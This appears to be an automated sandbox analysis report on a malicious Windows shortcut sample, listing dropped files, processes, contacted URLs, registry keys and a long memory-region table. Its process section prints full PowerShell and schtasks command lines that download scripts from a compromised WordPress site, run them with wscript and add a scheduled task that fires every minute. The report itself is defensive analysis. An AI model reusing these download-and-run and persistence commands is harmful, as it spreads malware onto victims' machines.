Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
yT6gJFN0SR.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:54 2024, atime=Mon Apr 8
20:19:11 2024, length=455680, window=hidenormalshowminimized
|
initial sample
|
||
C:\ProgramData\NDU462JA8L5M.js
|
ASCII text, with very long lines (398)
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4l3cetix.htr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aspxuzhl.pkd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuf5hhli.zqz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_goh4mvnq.uuo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixtlxc5b.imn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lt0wqamh.l4h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0mxhpsr.ain.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0wtyxfu.ek2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\epZTzlYAtsWrS0.js
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GTQLE48L41EUFM4ZQLOG.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\be35910bcc426105.customDestinations-ms (copy)
|
data
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php');
$KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js');
schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js
' * 2)) /tn e0OvtdEL8;
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js
epZTzlYAtsWrS0.js " /tn e0OvtdEL8
|
||
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js
"
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
|
||
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js
"
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
|
||
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js
"
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 8 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://www.italialife24.it
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
|
46.254.34.201
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
|
46.254.34.201
|
||
https://www.italialife24.it/wp-content
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/a
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
|
46.254.34.201
|
||
https://www.italialife24.it/wp-c
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/au
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingv
|
unknown
|
||
https://go.micros
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://oneget.org
|
unknown
|
||
http://italialife24.it
|
unknown
|
||
http://www.italialife24.it
|
unknown
|
||
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
italialife24.it
|
46.254.34.201
|
||
www.italialife24.it
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
46.254.34.201
|
italialife24.it
|
Italy
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1F1B22BC000
|
heap
|
page read and write
|
||
2285203C000
|
trusted library allocation
|
page read and write
|
||
7FFB1E102000
|
unkown
|
page readonly
|
||
178C47DA000
|
trusted library allocation
|
page read and write
|
||
4E3E0FF000
|
stack
|
page read and write
|
||
7FFAAC830000
|
trusted library allocation
|
page read and write
|
||
207AC0BB000
|
trusted library allocation
|
page read and write
|
||
D1F33CF000
|
stack
|
page read and write
|
||
E19F8FE000
|
stack
|
page read and write
|
||
7FFAAC7A0000
|
trusted library allocation
|
page execute and read and write
|
||
1F1B2312000
|
heap
|
page read and write
|
||
207ABE90000
|
heap
|
page readonly
|
||
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
207AA076000
|
heap
|
page read and write
|
||
1F1B22EE000
|
heap
|
page read and write
|
||
77E207E000
|
stack
|
page read and write
|
||
207BC031000
|
trusted library allocation
|
page read and write
|
||
1E4E6B60000
|
heap
|
page read and write
|
||
22868EF1000
|
heap
|
page read and write
|
||
1F1B2312000
|
heap
|
page read and write
|
||
178C1294000
|
heap
|
page read and write
|
||
178C1200000
|
heap
|
page readonly
|
||
D1F330D000
|
stack
|
page read and write
|
||
1B95671A000
|
heap
|
page read and write
|
||
7FFAAC841000
|
trusted library allocation
|
page read and write
|
||
207AC020000
|
heap
|
page read and write
|
||
178C3E1C000
|
trusted library allocation
|
page read and write
|
||
77E1C7E000
|
stack
|
page read and write
|
||
2284EBA0000
|
heap
|
page read and write
|
||
7FFAAC766000
|
trusted library allocation
|
page execute and read and write
|
||
1FB69665000
|
heap
|
page read and write
|
||
1FB69669000
|
heap
|
page read and write
|
||
D1F34CD000
|
stack
|
page read and write
|
||
75399A000
|
stack
|
page read and write
|
||
22868A80000
|
trusted library allocation
|
page read and write
|
||
1FB69682000
|
heap
|
page read and write
|
||
7FFAAC8E0000
|
trusted library allocation
|
page read and write
|
||
1B9566F6000
|
heap
|
page read and write
|
||
178C4E0E000
|
trusted library allocation
|
page read and write
|
||
873594B000
|
stack
|
page read and write
|
||
1B9566FD000
|
heap
|
page read and write
|
||
7FFAAC880000
|
trusted library allocation
|
page execute and read and write
|
||
1E4E6D80000
|
heap
|
page read and write
|
||
1E4DEAE3000
|
trusted library allocation
|
page read and write
|
||
46EE13B000
|
stack
|
page read and write
|
||
1FB69646000
|
heap
|
page read and write
|
||
7FFB23A72000
|
unkown
|
page readonly
|
||
7FFAAC9C0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC9D0000
|
trusted library allocation
|
page read and write
|
||
5B244FE000
|
stack
|
page read and write
|
||
1F1B22E0000
|
heap
|
page read and write
|
||
2284EE90000
|
heap
|
page read and write
|
||
22868BFE000
|
heap
|
page read and write
|
||
77E2BCD000
|
stack
|
page read and write
|
||
207AD73D000
|
trusted library allocation
|
page read and write
|
||
1B9566F8000
|
heap
|
page read and write
|
||
1B95672A000
|
heap
|
page read and write
|
||
1E4D0075000
|
trusted library allocation
|
page read and write
|
||
1E4D0067000
|
trusted library allocation
|
page read and write
|
||
1E4D007B000
|
trusted library allocation
|
page read and write
|
||
2285167C000
|
trusted library allocation
|
page read and write
|
||
207A9F70000
|
heap
|
page read and write
|
||
1B956722000
|
heap
|
page read and write
|
||
D1F24BE000
|
stack
|
page read and write
|
||
22852324000
|
trusted library allocation
|
page read and write
|
||
1B956723000
|
heap
|
page read and write
|
||
1F89123A000
|
heap
|
page read and write
|
||
22868C3C000
|
heap
|
page read and write
|
||
1F89124F000
|
heap
|
page read and write
|
||
7FFAAC850000
|
trusted library allocation
|
page execute and read and write
|
||
1E4CCA70000
|
heap
|
page read and write
|
||
7FFAAC8B5000
|
trusted library allocation
|
page read and write
|
||
1F1B2303000
|
heap
|
page read and write
|
||
1E4CCB52000
|
heap
|
page read and write
|
||
1F1B2312000
|
heap
|
page read and write
|
||
207AA080000
|
heap
|
page read and write
|
||
1E4CEC9C000
|
trusted library allocation
|
page read and write
|
||
207C4416000
|
heap
|
page read and write
|
||
207A9F40000
|
heap
|
page read and write
|
||
178C2CA5000
|
heap
|
page read and write
|
||
207AA0C0000
|
heap
|
page read and write
|
||
1D167FF2000
|
heap
|
page read and write
|
||
178C31B0000
|
heap
|
page execute and read and write
|
||
1FB6969D000
|
heap
|
page read and write
|
||
207AD68F000
|
trusted library allocation
|
page read and write
|
||
22852056000
|
trusted library allocation
|
page read and write
|
||
D1F2478000
|
stack
|
page read and write
|
||
1F891270000
|
heap
|
page read and write
|
||
E61E6FF000
|
stack
|
page read and write
|
||
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
77E217B000
|
stack
|
page read and write
|
||
1F891245000
|
heap
|
page read and write
|
||
7FFAAC694000
|
trusted library allocation
|
page read and write
|
||
1B95671A000
|
heap
|
page read and write
|
||
1B956712000
|
heap
|
page read and write
|
||
753FFE000
|
stack
|
page read and write
|
||
2285229E000
|
trusted library allocation
|
page read and write
|
||
24648A60000
|
heap
|
page read and write
|
||
46EDBFF000
|
stack
|
page read and write
|
||
1FB6966B000
|
heap
|
page read and write
|
||
1E4CEAE7000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8C5000
|
trusted library allocation
|
page read and write
|
||
7FFAAC880000
|
trusted library allocation
|
page execute and read and write
|
||
24BB4C18000
|
heap
|
page read and write
|
||
22852086000
|
trusted library allocation
|
page read and write
|
||
178DB3A5000
|
heap
|
page read and write
|
||
1FB69693000
|
heap
|
page read and write
|
||
3CA5BBE000
|
stack
|
page read and write
|
||
1D16819E000
|
heap
|
page read and write
|
||
7FFAAC862000
|
trusted library allocation
|
page read and write
|
||
7FFAAC750000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC930000
|
trusted library allocation
|
page read and write
|
||
3FFF7FC000
|
stack
|
page read and write
|
||
7FFAAC68D000
|
trusted library allocation
|
page execute and read and write
|
||
22868E90000
|
heap
|
page read and write
|
||
E19F4FA000
|
stack
|
page read and write
|
||
7FFB22760000
|
unkown
|
page readonly
|
||
3CA58FD000
|
stack
|
page read and write
|
||
7FFAAC940000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8D0000
|
trusted library allocation
|
page read and write
|
||
1B95671A000
|
heap
|
page read and write
|
||
207ADC9E000
|
trusted library allocation
|
page read and write
|
||
178D3201000
|
trusted library allocation
|
page read and write
|
||
7FFAAC9A0000
|
trusted library allocation
|
page read and write
|
||
1F1B22E6000
|
heap
|
page read and write
|
||
7FFAAC9D0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
1B956722000
|
heap
|
page read and write
|
||
1D167E50000
|
heap
|
page read and write
|
||
1D167FE7000
|
heap
|
page read and write
|
||
2284EE10000
|
trusted library allocation
|
page read and write
|
||
7FFB23A75000
|
unkown
|
page readonly
|
||
77E20FF000
|
stack
|
page read and write
|
||
1FB69689000
|
heap
|
page read and write
|
||
1E4E6ABE000
|
heap
|
page read and write
|
||
3CA5AB8000
|
stack
|
page read and write
|
||
1F1B2306000
|
heap
|
page read and write
|
||
178C4A6D000
|
trusted library allocation
|
page read and write
|
||
1B9565C5000
|
heap
|
page read and write
|
||
2284EF60000
|
heap
|
page read and write
|
||
7FFAAC84A000
|
trusted library allocation
|
page read and write
|
||
178DB389000
|
heap
|
page read and write
|
||
1E4CF69C000
|
trusted library allocation
|
page read and write
|
||
1B9566DE000
|
heap
|
page read and write
|
||
207AC031000
|
trusted library allocation
|
page read and write
|
||
4E3D8F9000
|
stack
|
page read and write
|
||
46EDC7E000
|
stack
|
page read and write
|
||
207C4280000
|
heap
|
page read and write
|
||
1E4CCAFA000
|
heap
|
page read and write
|
||
1E4CCAB8000
|
heap
|
page read and write
|
||
1E4CCAAE000
|
heap
|
page read and write
|
||
24BB4B50000
|
heap
|
page read and write
|
||
7FFAAC683000
|
trusted library allocation
|
page execute and read and write
|
||
1E4E6A70000
|
heap
|
page read and write
|
||
1D167F30000
|
heap
|
page read and write
|
||
D1F2073000
|
stack
|
page read and write
|
||
207C4036000
|
heap
|
page read and write
|
||
22868BD9000
|
heap
|
page read and write
|
||
1F891219000
|
heap
|
page read and write
|
||
24648AA0000
|
heap
|
page read and write
|
||
7FFB1E105000
|
unkown
|
page readonly
|
||
1E4CE703000
|
trusted library allocation
|
page read and write
|
||
7FFAAC9C0000
|
trusted library allocation
|
page read and write
|
||
2284EC97000
|
heap
|
page read and write
|
||
2284EC5B000
|
heap
|
page read and write
|
||
1D168012000
|
heap
|
page read and write
|
||
7542FE000
|
stack
|
page read and write
|
||
178C4A42000
|
trusted library allocation
|
page read and write
|
||
D1F2537000
|
stack
|
page read and write
|
||
207C42A0000
|
heap
|
page read and write
|
||
1FB69665000
|
heap
|
page read and write
|
||
1B956690000
|
heap
|
page read and write
|
||
1FB696A7000
|
heap
|
page read and write
|
||
7FFAAC8B0000
|
trusted library allocation
|
page read and write
|
||
22860AC3000
|
trusted library allocation
|
page read and write
|
||
22868F15000
|
heap
|
page read and write
|
||
24648A40000
|
heap
|
page read and write
|
||
1B95671E000
|
heap
|
page read and write
|
||
7FFAAC960000
|
trusted library allocation
|
page read and write
|
||
1D167FE7000
|
heap
|
page read and write
|
||
46EDE37000
|
stack
|
page read and write
|
||
1F1B24B5000
|
heap
|
page read and write
|
||
178C1505000
|
heap
|
page read and write
|
||
1B956725000
|
heap
|
page read and write
|
||
7FFB22779000
|
unkown
|
page readonly
|
||
1D167F90000
|
heap
|
page read and write
|
||
178C11F0000
|
trusted library allocation
|
page read and write
|
||
1FACEA30000
|
heap
|
page read and write
|
||
7FFAAC940000
|
trusted library allocation
|
page read and write
|
||
7FFB1E100000
|
unkown
|
page read and write
|
||
7FFB22761000
|
unkown
|
page execute read
|
||
1FB696A6000
|
heap
|
page read and write
|
||
D1F237E000
|
stack
|
page read and write
|
||
7FFB1E100000
|
unkown
|
page read and write
|
||
7FFB1E102000
|
unkown
|
page readonly
|
||
1D167F99000
|
heap
|
page read and write
|
||
D0BFBF000
|
stack
|
page read and write
|
||
77E1E78000
|
stack
|
page read and write
|
||
7FFAAC776000
|
trusted library allocation
|
page execute and read and write
|
||
1F1B20F0000
|
heap
|
page read and write
|
||
77E17AE000
|
stack
|
page read and write
|
||
46EDAFE000
|
stack
|
page read and write
|
||
1D167FF0000
|
heap
|
page read and write
|
||
1E4E6DB4000
|
heap
|
page read and write
|
||
2284EF00000
|
heap
|
page execute and read and write
|
||
1B956722000
|
heap
|
page read and write
|
||
E19F9FF000
|
stack
|
page read and write
|
||
7FFAAC872000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A0000
|
trusted library allocation
|
page read and write
|
||
7FFB23A51000
|
unkown
|
page execute read
|
||
7FFAAC870000
|
trusted library allocation
|
page execute and read and write
|
||
24BB4C10000
|
heap
|
page read and write
|
||
1B9566A8000
|
heap
|
page read and write
|
||
7FFAAC8D0000
|
trusted library allocation
|
page read and write
|
||
207C422C000
|
heap
|
page read and write
|
||
1E4E6AF7000
|
heap
|
page read and write
|
||
1B9566EF000
|
heap
|
page read and write
|
||
7FFAAC8F0000
|
trusted library allocation
|
page read and write
|
||
46ED743000
|
stack
|
page read and write
|
||
D1F217E000
|
stack
|
page read and write
|
||
1FB69646000
|
heap
|
page read and write
|
||
3FFF4FD000
|
stack
|
page read and write
|
||
3CA5362000
|
stack
|
page read and write
|
||
7FFAAC9B0000
|
trusted library allocation
|
page read and write
|
||
178C31E0000
|
heap
|
page execute and read and write
|
||
1E4E6AA6000
|
heap
|
page read and write
|
||
1B9566F6000
|
heap
|
page read and write
|
||
7FFAAC832000
|
trusted library allocation
|
page read and write
|
||
1B9566F6000
|
heap
|
page read and write
|
||
1B9565C0000
|
heap
|
page read and write
|
||
3CA684F000
|
stack
|
page read and write
|
||
7FFAAC990000
|
trusted library allocation
|
page read and write
|
||
3CA5B3E000
|
stack
|
page read and write
|
||
207C42A2000
|
heap
|
page read and write
|
||
1F1B24B0000
|
heap
|
page read and write
|
||
752868B000
|
stack
|
page read and write
|
||
1B9564C0000
|
heap
|
page read and write
|
||
7FFAAC83A000
|
trusted library allocation
|
page read and write
|
||
207AD952000
|
trusted library allocation
|
page read and write
|
||
2284EC10000
|
heap
|
page read and write
|
||
2285266B000
|
trusted library allocation
|
page read and write
|
||
178DB380000
|
heap
|
page read and write
|
||
22868C8C000
|
heap
|
page read and write
|
||
46EEB8E000
|
stack
|
page read and write
|
||
207ABED0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC9D0000
|
trusted library allocation
|
page read and write
|
||
1D167FC7000
|
heap
|
page read and write
|
||
1FB6965F000
|
heap
|
page read and write
|
||
22851D90000
|
trusted library allocation
|
page read and write
|
||
207AA330000
|
heap
|
page read and write
|
||
7FFAAC880000
|
trusted library allocation
|
page read and write
|
||
178C47E6000
|
trusted library allocation
|
page read and write
|
||
7FFAAC980000
|
trusted library allocation
|
page read and write
|
||
1F1B22C7000
|
heap
|
page read and write
|
||
178C4800000
|
trusted library allocation
|
page read and write
|
||
1B95671E000
|
heap
|
page read and write
|
||
21C7DAF5000
|
heap
|
page read and write
|
||
7FFAAC925000
|
trusted library allocation
|
page read and write
|
||
1FB69665000
|
heap
|
page read and write
|
||
1FB69692000
|
heap
|
page read and write
|
||
1FB6B380000
|
heap
|
page read and write
|
||
22852043000
|
trusted library allocation
|
page read and write
|
||
7FFAAC692000
|
trusted library allocation
|
page read and write
|
||
207AD728000
|
trusted library allocation
|
page read and write
|
||
46EEB0E000
|
stack
|
page read and write
|
||
22868C77000
|
heap
|
page read and write
|
||
178C1500000
|
heap
|
page read and write
|
||
7FFAAC950000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8C0000
|
trusted library allocation
|
page read and write
|
||
1E4CE340000
|
trusted library allocation
|
page read and write
|
||
2284EC18000
|
heap
|
page read and write
|
||
7FFAAC693000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB1E102000
|
unkown
|
page readonly
|
||
207C4390000
|
heap
|
page execute and read and write
|
||
E19F5FD000
|
stack
|
page read and write
|
||
22868EFD000
|
heap
|
page read and write
|
||
207AD67C000
|
trusted library allocation
|
page read and write
|
||
7FFB23A70000
|
unkown
|
page read and write
|
||
1F891110000
|
heap
|
page read and write
|
||
1E4CCAB4000
|
heap
|
page read and write
|
||
1D167FBB000
|
heap
|
page read and write
|
||
7FFB1E0E1000
|
unkown
|
page execute read
|
||
2284EE70000
|
heap
|
page execute and read and write
|
||
178D33A1000
|
trusted library allocation
|
page read and write
|
||
7FFB22761000
|
unkown
|
page execute read
|
||
1E4DEA81000
|
trusted library allocation
|
page read and write
|
||
1B956712000
|
heap
|
page read and write
|
||
7FFAAC890000
|
trusted library allocation
|
page read and write
|
||
7FFAAC920000
|
trusted library allocation
|
page read and write
|
||
1F891247000
|
heap
|
page read and write
|
||
1E4CCAF7000
|
heap
|
page read and write
|
||
7FFAAC9A0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC9E0000
|
trusted library allocation
|
page read and write
|
||
1E4DEC19000
|
trusted library allocation
|
page read and write
|
||
1E4CE9B0000
|
heap
|
page execute and read and write
|
||
24648B1D000
|
heap
|
page read and write
|
||
46EDCFE000
|
stack
|
page read and write
|
||
207A9FB0000
|
heap
|
page read and write
|
||
1E4E6D72000
|
heap
|
page read and write
|
||
7FFAAC694000
|
trusted library allocation
|
page read and write
|
||
1E4CCA40000
|
heap
|
page read and write
|
||
178C2B50000
|
trusted library allocation
|
page read and write
|
||
1FACEB10000
|
heap
|
page read and write
|
||
1F8912B9000
|
heap
|
page read and write
|
||
1F891310000
|
heap
|
page read and write
|
||
1E4E6DB7000
|
heap
|
page read and write
|
||
178C1050000
|
heap
|
page read and write
|
||
1F1B2303000
|
heap
|
page read and write
|
||
7FFB1E0E1000
|
unkown
|
page execute read
|
||
7FFAAC930000
|
trusted library allocation
|
page read and write
|
||
1FB6964E000
|
heap
|
page read and write
|
||
22868D60000
|
heap
|
page read and write
|
||
22868F37000
|
heap
|
page read and write
|
||
1F1B2303000
|
heap
|
page read and write
|
||
207BC1E3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC841000
|
trusted library allocation
|
page read and write
|
||
1F1B22AC000
|
heap
|
page read and write
|
||
178C47FA000
|
trusted library allocation
|
page read and write
|
||
46EE03E000
|
stack
|
page read and write
|
||
22860A51000
|
trusted library allocation
|
page read and write
|
||
3CA5D3C000
|
stack
|
page read and write
|
||
7FFB23A66000
|
unkown
|
page readonly
|
||
7FFAAC850000
|
trusted library allocation
|
page execute and read and write
|
||
22868BD0000
|
heap
|
page read and write
|
||
22868BED000
|
heap
|
page read and write
|
||
7FFAAC860000
|
trusted library allocation
|
page execute and read and write
|
||
46EDEB9000
|
stack
|
page read and write
|
||
7FFAAC860000
|
trusted library allocation
|
page execute and read and write
|
||
1B9566A0000
|
heap
|
page read and write
|
||
E19FFFB000
|
stack
|
page read and write
|
||
3CA59BE000
|
stack
|
page read and write
|
||
7FFAAC900000
|
trusted library allocation
|
page read and write
|
||
1FB6969A000
|
heap
|
page read and write
|
||
178C2B99000
|
heap
|
page read and write
|
||
24648C65000
|
heap
|
page read and write
|
||
3FFF3FF000
|
stack
|
page read and write
|
||
7FFAAC693000
|
trusted library allocation
|
page execute and read and write
|
||
1E4D02EE000
|
trusted library allocation
|
page read and write
|
||
2284EDE0000
|
heap
|
page read and write
|
||
7FFAAC970000
|
trusted library allocation
|
page read and write
|
||
1F891247000
|
heap
|
page read and write
|
||
E61E0F9000
|
stack
|
page read and write
|
||
1B959EE0000
|
trusted library allocation
|
page read and write
|
||
1B9566C1000
|
heap
|
page read and write
|
||
1E4CE320000
|
trusted library allocation
|
page read and write
|
||
1E4CE385000
|
heap
|
page read and write
|
||
7FFAAC840000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC736000
|
trusted library allocation
|
page read and write
|
||
1FB69698000
|
heap
|
page read and write
|
||
5B240FE000
|
stack
|
page read and write
|
||
178DB650000
|
heap
|
page read and write
|
||
8735C7F000
|
stack
|
page read and write
|
||
22852045000
|
trusted library allocation
|
page read and write
|
||
1F892B70000
|
heap
|
page read and write
|
||
7FFAAC9E0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC9C0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC73C000
|
trusted library allocation
|
page execute and read and write
|
||
1FB69682000
|
heap
|
page read and write
|
||
1E4CC8F0000
|
heap
|
page read and write
|
||
7FFAAC960000
|
trusted library allocation
|
page read and write
|
||
3FFEBBA000
|
stack
|
page read and write
|
||
46EDA7E000
|
stack
|
page read and write
|
||
178C4ABC000
|
trusted library allocation
|
page read and write
|
||
1B958370000
|
heap
|
page read and write
|
||
D1F27BB000
|
stack
|
page read and write
|
||
1E4CE9B7000
|
heap
|
page execute and read and write
|
||
21C7D748000
|
heap
|
page read and write
|
||
24648AD8000
|
heap
|
page read and write
|
||
7540FF000
|
stack
|
page read and write
|
||
D1F20FD000
|
stack
|
page read and write
|
||
1FB695C0000
|
heap
|
page read and write
|
||
1D169D70000
|
heap
|
page read and write
|
||
7FFB23A70000
|
unkown
|
page read and write
|
||
1B956722000
|
heap
|
page read and write
|
||
7FFAAC750000
|
trusted library allocation
|
